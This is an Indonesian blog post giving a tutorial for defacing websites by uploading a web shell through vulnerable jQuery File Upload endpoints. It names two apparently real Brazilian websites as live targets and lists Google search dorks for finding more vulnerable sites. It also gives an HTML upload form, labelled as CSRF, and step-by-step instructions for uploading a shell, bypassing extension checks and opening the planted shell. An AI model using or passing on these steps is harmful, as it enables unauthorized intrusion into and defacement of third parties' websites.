Rabu, 03 Januari 2018

cara deface web lewat android

Assalamualaikum wr.wb

Kembali lagi bersama ane diblog ane tentunya :v
Oke disi ane akan bagi cara deface lewat android people.
Bagi yang belom tau apa itu deface nih artikelnyahttp://linkshrink.net/7H1yCx

Okeh deh Langsung aja tutorial nya :'v
TUTORIAL DEFACE JQUERY FILE UPLOAD / FILE ARRAY

Saya kasih contoh 2 web dibawah ini vuln - LIVE TARGET
http://www.liberdadeshopping.com.br/dashboard/server/php/
http://www.samaraveras.com.br/dashboard/server/php/

dork :
lewat google gambar
inurl:/server/php/files/
inurl:/foto/server/php/files/
inurl:/images/server/php/files/
inurl:/admin/server/php/files/

entar lu buka gambarnya

lewat google biasa
inurl:/assets/global/plugins/jquery-file-upload/server/php/

use your brain oke,, pokoknya exploit di /server/php/ ,, di /server/php muncul kaya gini nih biasanya -> files []

atau kalo gak muncul coba liat /server/php/index.php kalo not found gak vuln

Ini CSRF nya

<form method="POST" action=" target.co.il/.../server/php/ "enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

save as .html

1.Siapkan shell
2.Buka web yang vuln,, and copy urlnya target.co.il/../server/php/
3.paste url di CSRF
4.buka csrfnya pake (buka pake browser atau lu upload csrfnya ke web yang udah lu tanem shell)
5.udah lu buka kan?? nah tinggal upload shell lu aja  ,,, bisa langsung atau lu bypas extensinya
6. tanda shell masuk yaitu ada tulisan
{"files":[{"name":"nama shell lu.php","size":29,"type":"application\/octet-stream","url":"http:\/\/target.co.il\/..\/server\/php\/files\/nama shell lu.php

akses shell di /server/php/files/


NB : apabila lu pas buka shell malah kedownload berarti webnya juga gak vuln

SEMOGA BERMANFAAT

Okeh udah paham?Sekian dari ane :v


YouTube:https://www.youtube.com/channel/UCBcFPoVBbUe-PVRN4i5kwcg
                  IGN VG :V : yudha00
                  IGN ML : Yudha_00